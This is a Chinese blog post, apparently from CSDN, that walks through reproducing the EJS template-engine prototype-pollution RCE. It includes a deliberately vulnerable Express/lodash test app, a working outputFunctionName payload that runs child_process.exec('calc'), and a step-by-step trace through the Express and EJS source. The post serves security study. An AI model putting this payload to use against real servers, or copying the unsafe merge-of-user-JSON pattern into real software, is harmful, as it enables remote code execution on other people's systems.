ejs原型链污染rce分析

已于 2023-02-07 17:34:44 修改
阅读量960 收藏 5
点赞数 3
分类专栏: node.js 文章标签: javascript 前端 开发语言 Powered by 金山文档
于 2023-02-07 16:23:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/128914419
版权
文章详细介绍了如何搭建环境来复现EJS模板引擎中的一个特定漏洞,该漏洞涉及原型链污染,允许攻击者通过构造特定的payload执行任意代码。通过分析流程,作者展示了漏洞的触发点在于`res.render`方法和EJS引擎的编译过程,其中`outputFunctionName`参数被用于拼接代码并执行。文章提供了payload构造方法,并给出了利用此漏洞执行`calc`命令的例子。
摘要由CSDN通过智能技术生成

记录自己的理解,有什么不对的欢迎各位师傅指正。

一、环境搭建

npm install ejs@3.1.5
npm install lodash@4.17.4
npm install express

注意这里的ejs版本需要低一些,因为高版本修复了该漏洞。加了一些正则匹配,如果出现outputFunctionName is not a valid JS identifier错误的话,证明你的版本比较高。

index.js

var express = require('express');
var _= require('lodash');
var ejs = require('ejs');

var app = express();
//设置模板的位置
app.set('views', __dirname);

//对原型进行污染
// var malicious_payload = '{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require(\'child_process\').exec(\'calc\');var __tmp2"}}';



//进行渲染
app.get('/', function (req, res) {
    var malicious_payload = req.query.malicious_payload;
    _.merge({}, JSON.parse(malicious_payload));
    res.render ("./test.ejs",{
        message: 'lufei test '
    });
});

//设置http
var server = app.listen(8888, function () {

    var port = server.address().port

    console.log("应用实例,访问地址为 http://127.0.0.1:%s", port)
});

test.ejs

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title></title>
</head>
<body>

<h1><%= message%></h1>

</body>
</html>

二、漏洞复现

malicious_payload = {"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('calc');var __tmp2"}}

三、漏洞分析

3.1、流程分析

var malicious_payload = req.query.malicious_payload;
    _.merge({}, JSON.parse(malicious_payload));

这里的代码获取我们传入的get参数。然后解析成json格式,接着调用merge函数,这样的话就会产生原型链污染。就理解成我们可以控制一些参数。

例如我们的payload,把Object对象的outputFunctionName的值设置为我们精心构造的值。

接下来我们思考如何如果用到这个值,以及在哪执行的代码。如何去构造这个payload。先从入口函数开始看。

 res.render ("./test.ejs",{
        message: 'lufei test '
    });

这边是调用response对象的render方法去渲染页面,第一个参数为模板文件路径。第二个是一个对象,里面就一个属性,message的属性值为lufei test,字符串类型。

res.render = function render(view, options, callback) {
  var app = this.req.app;
  var done = callback;
  var opts = options || {};
  var req = this.req;
  var self = this;

  // support callback function as second arg
  if (typeof options === 'function') {
    done = options;
    opts = {};
  }

  // merge res.locals
  opts._locals = self.locals;

  // default callback to respond
  done = done || function (err, str) {
    if (err) return req.next(err);
    self.send(str);
  };

  // render
  app.render(view, opts, done);
};

其中我们看到app.render(view, opts, done);这行代码,前面一些代码都不重要,这里调用了app对象里面的render方法,这边会进入到View这个文件的构造方法里。这里比较重要。

function View(name, options) {
  var opts = options || {};

  this.defaultEngine = opts.defaultEngine;
  this.ext = extname(name);
  this.name = name;
  this.root = opts.root;

  if (!this.ext && !this.defaultEngine) {
    throw new Error('No default engine was specified and no extension was provided.');
  }

  var fileName = name;

  if (!this.ext) {
    // get extension from default engine name
    this.ext = this.defaultEngine[0] !== '.'
      ? '.' + this.defaultEngine
      : this.defaultEngine;

    fileName += this.ext;
  }

  if (!opts.engines[this.ext]) {
    // load engine
    var mod = this.ext.slice(1)
    debug('require "%s"', mod)

    // default engine export
    var fn = require(mod).__express

    if (typeof fn !== 'function') {
      throw new Error('Module "' + mod + '" does not provide a view engine.')
    }

    opts.engines[this.ext] = fn
  }

可以看到,我们传入的name是./test.ejs,通过extname可以获取到.ejs,然后偶他会判断后缀名是否不存在,或者不存在默认的引擎。然后再判断一次是否不存在后缀。我们这边都不满足,所以都跳过了。

接着判断是否不在这个opts.engines里面,相当于引擎容器,这时是空的,所以一定会进去。里面的代码好好看看,先把第一个.字符截取掉,然后去require这个ejs模块,将__express赋值给fn。我们看看__express是什么。

__express就是exports.renderFile这个函数。然后将fn赋值给opts.engines[this.ext],然后赋值给this.engine。这边记住这个this.engine。继续从app.render分析。

app.render = function render(name, options, callback) {
  var cache = this.cache;
  var done = callback;
  var engines = this.engines;
  var opts = options;
  var renderOptions = {};
  var view;

  // support callback function as second arg
  if (typeof options === 'function') {
    done = options;
    opts = {};
  }

  // merge app.locals
  merge(renderOptions, this.locals);

  // merge options._locals
  if (opts._locals) {
    merge(renderOptions, opts._locals);
  }

  // merge options
  merge(renderOptions, opts);

  // set .cache unless explicitly provided
  if (renderOptions.cache == null) {
    renderOptions.cache = this.enabled('view cache');
  }

  // primed cache
  if (renderOptions.cache) {
    view = cache[name];
  }

  // view
  if (!view) {
    var View = this.get('view');

    view = new View(name, {
      defaultEngine: this.get('view engine'),
      root: this.get('views'),
      engines: engines
    });

    if (!view.path) {
      var dirs = Array.isArray(view.root) && view.root.length > 1
        ? 'directories "' + view.root.slice(0, -1).join('", "') + '" or "' + view.root[view.root.length - 1] + '"'
        : 'directory "' + view.root + '"'
      var err = new Error('Failed to lookup view "' + name + '" in views ' + dirs);
      err.view = view;
      return done(err);
    }

    // prime the cache
    if (renderOptions.cache) {
      cache[name] = view;
    }
  }

  // render
  tryRender(view, renderOptions, done);
};

中间的一些代码也不是很重要,其中最后一行代码调用了tryRender方法,我们继续跟进。

function tryRender(view, options, callback) {
  try {
    view.render(options, callback);
  } catch (err) {
    callback(err);
  }
}

代码来到try里面。调用view对象的render方法。

然后调用this.engine这个函数,这个函数其实就是ejs里面的rendFile函数。前面我们分析过为什么了。然后继续跟进。

exports.renderFile = function () {
  var args = Array.prototype.slice.call(arguments);
  var filename = args.shift();
  var cb;
  var opts = {filename: filename};
  var data;
  var viewOpts;

  // Do we have a callback?
  if (typeof arguments[arguments.length - 1] == 'function') {
    cb = args.pop();
  }
  // Do we have data/opts?
  if (args.length) {
    // Should always have data obj
    data = args.shift();
    // Normal passed opts (data obj + opts obj)
    if (args.length) {
      // Use shallowCopy so we don't pollute passed in opts obj with new vals
      utils.shallowCopy(opts, args.pop());
    }
    // Special casing for Express (settings + opts-in-data)
    else {
      // Express 3 and 4
      if (data.settings) {
        // Pull a few things from known locations
        if (data.settings.views) {
          opts.views = data.settings.views;
        }
        if (data.settings['view cache']) {
          opts.cache = true;
        }
        // Undocumented after Express 2, but still usable, esp. for
        // items that are unsafe to be passed along with data, like `root`
        viewOpts = data.settings['view options'];
        if (viewOpts) {
          utils.shallowCopy(opts, viewOpts);
        }
      }
      // Express 2 and lower, values set in app.locals, or people who just
      // want to pass options in their data. NOTE: These values will override
      // anything previously set in settings  or settings['view options']
      utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA_EXPRESS);
    }
    opts.filename = filename;
  }
  else {
    data = {};
  }

  return tryHandleCache(opts, data, cb);
};

继续最后一行,执行tryHandleCache方法。跟进。

cb是存在的回调函数,所以不进入if,进入else。这里注意,调用了handleCache方法,肯定会返回一个函数的。因为在后面加了(data)。会去调用这个函数。

继续跟进handleCache函数。

然后来到exports.compile函数,里面传了两个参数第一个是模板。通过前面文件读取test.ejs里面的内容获取的值。第二个是一个对象。继续跟进。

可以看到最后调用了templ.compile。编译模板文件。继续跟进。

注意看。this.source此时为空,进入if。然后看到代码

if (opts.outputFunctionName) {
prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';
}

如果opts里面存在outputFunctionName属性的话。就进行字符串拼接。然后赋值给prepended属性。

接着将prependedp拼接传入给了this.source。

然后赋值给了src属性。这里的ctor就是Function。也就是这里创建了一个函数,第一个参数就是函数需要传入的变量,第二个参数就是函数执行的内容。那么第二个参数我们如果能控制的话,并且调用了这个函数,就可以任意代码执行。

下面刚好调用了apply方法,执行了这个函数。这里也是代码执行的点。

但是他并不会直接执行这里的代码,前面有一个三元运算符,opts.client为true的话,就将fn赋值给returnedFn,这里他是false。所以将anonymous这个函数赋值给returnedFn。然后ruturn返回。一直返回到我们之前说的那个调用这个函数的地方。最后才会进入这个函数里面去调用。最终执行代码。

3.2、payload构造

我们先梳理一下漏洞的产生。

  • 需要有一个原型链污染,这样我们可以控制一些没有赋值的变量

  • 在ejs渲染的时候会去拼接outputFunctionName这个变量。赋值给src

  • 然后运行src代码

那么我们构造payload就需要知道拼接是怎么拼接的。代码如下。

 if (opts.outputFunctionName) {
        prepended += '  var ' + opts.outputFunctionName + ' = __append;' + '\n';
      }

其中prepended为

var __output = "";

function __append(s) { if (s !== undefined && s !== null) __output += s }

然后加上var ,接着加上我们的payload。然后加上= __append;

。整理一下 如下代码。

  var __output = "";
  function __append(s) { if (s !== undefined && s !== null) __output += s }
  var  [payload拼接所在的 地方] = __append;

那么我们将payload设置为

_tmp1;global.process.mainModule.require('child_process').exec('calc');var __tmp2"}}

最终的代码会变成

 var __output = "";
  function __append(s) { if (s !== undefined && s !== null) __output += s }
  var  _tmp1;global.process.mainModule.require('child_process').exec('calc');var __tmp2 = __append;

最终成为一个可以运行的代码。

参考

https://xz.aliyun.com/t/7075#toc-5

https://evi0s.com/2019/08/30/expresslodashejs-%E4%BB%8E%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93%E5%88%B0rce/

angelkat
关注
专栏目录
dejs:deno 的 ejs 模板引擎
08-04
包含部分 ejs 模板 不支持 ejs 的所有其他特性 用法 import * as dejs from "https://deno.land/x/dejs@0.10.1/mod.ts" ; renderFile (filePath: string, params: Params): Promise<Deno> 从文件渲染,...
Ejs模板引擎注入实现RCE
2302_76827504的博客
04-12 1581
EJS是一个javascript模板库,用来从json数据中生成HTML字符串。
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3931
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
js原型链污染
最新发布
2301_79700060的博客
10-04 970
如果可以控制a、b、value的值,将a设置为__proto__,我们就可以给object对象的原型设置一个b属性,值为value。这样所有继承object对象原型的实例对象在本身不拥有b属性的情况下,都会拥有b属性,且值为value。demo在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型链污染
Nodejs原型链污染
qq_61768489的博客
02-05 780
Nodejs原型链污染例题解析
CTFshowWeb入门nodejs
Yu3511606536的博客
06-09 1226
ctfshowweb入门nodejs刷题,超详细基础
复现原型链污染
qq_53232332的博客
08-03 98
指向的是Foo类的prototype。那么,如果我们修改了中的值,是不是就可以修改Foo类呢?原因也显而易见:因为前面我们修改了foo的原型,而foo是一个Object类的实例,所以实际上是修改了Object这个类,给这个类增加了一个属性bar,值为2。后来,我们又用Object类创建了一个zoo对象,zoo对象自然也有一个bar属性了。那么,在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是。
ARM926EJS FreeRTOS移植KEIL GCC.zip
11-09
总结来说,"ARM926EJS FreeRTOS移植KEIL GCC.zip"项目涉及了嵌入式系统开发、实时操作系统移植、硬件接口驱动编写、编译工具链使用等多个技术领域,是学习和实践嵌入式RTOS开发的宝贵资源。通过这个项目,开发者可以...
CRUD-Express:EJS模板引擎
04-06
模板引擎的ejs
EJS-BlogWebsite
04-13
EJS BLOG挑战 挑战赛设置 - Download Starting File and Move to Root Directory - Open App.js in VScode and expand folders - Styles are already configured - Ignore the .DS_Store Files - Header/Footer ...
exercise-ejs-express
04-16
看一看那些页面如何包含header.ejs和head.ejs局部。 案文并没有真正的意义; 选择您所选择的之一。 3.新表格页面 使用模板语法创建一个新页面。 我们需要一个表格将新的吉祥物发送到我们的服务器; 因此它显示在...
[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)
車鈊的博客
04-06 2067
EJS _CVE-2019-10744(outputFunctionName) 在EJS引擎当中,存在一个属性opts.outputFunctionName (注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用) 读源码 ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。 【以下代码为exports.render-----调用----->handleCache】 首先调用了render的话(在我们做题时可以看到的表层函数) render调用的handl
nodejs——ejs模版遇到原型链污染产生rce
m0_73756016的博客
06-19 430
EJS是一个javascript模板库,用来从json数据中生成HTML字符串功能:缓存功能,能够缓存好的HTML模板;<% code %>用来执行javascript代码安装:看了一圈这个写的最详细Express+lodash+ejs: 从原型链污染RCE懂了个大概吧就是还有这篇文章从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台大概意思就是说ejs在渲染的时候有大量代码拼接然后我们通过原型链污染达到变量覆盖就可以构造注入先闭合上面的语句再构造rce的语句。
【严重】ejs 存在服务端模板注入漏洞(存在POC)
murphysec的博客
05-24 1415
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。EJS 是开源的 JavaScript 模板引擎,允许在HTML代码中使用JavaScript代码块,closeDelimiter 参数是 EJS 模板中的结束标记,用于指定结束分隔符。node-ejs@影响所有版本。
js原型链污染(超详细)
qq_51586883的博客
08-23 6509
js创建对象的三种方法 : 普通创建 var person={name:'lihuaiqiu','age','19'} ​ var person={} //创建空对象 构造函数方法创建 function person(){ this.name="liahuqiu"; this.test=function () { return 23333; ​ } } person.prototype.a=3; web=new person(); console.l...
ejs默认配置 原型链污染
rev1ve的博客
01-06 1271
我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。不过其中大多数都使用。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。
node.js原型链污染漏洞
weixin_43610673的博客
02-27 3047
node.js入门:http://nodejs.cn/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs 根据上面说明要掌握的JavaScript部分直接看菜鸟教程学。 对象与原型链 JavaScript当中的所有事物都是对象:字符串、数值、数组、函数。对象只是一种特殊的数据。对象拥有属性和方法。 可以这样创建一个对象 var person = {firstName:"John", lastName:"Doe", age:50, eyeCo
not a valid identifier问题解决
masteryi-0018的博客
07-25 4889
not a valid identifier问题解决
CTFshow nodejs
starttv的博客
11-19 663
​Node.js 是一个基于 Chrome V8 引擎的 Javascript 运行环境。可以说nodejs是一个运行环境,或者说是一个 JS 语言解释器而不是某种库。 Nodejs 是基于 Chrome 的 V8 引擎开发的一个 C++ 程序,目的是提供一个 JS 的运行环境。最早 Nodejs 主要是安装在服务器上,辅助大家用 JS 开发高性能服务器代码,但是后来 Nodejs前端也大放异彩,带来了 Web 前端开发的革命。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值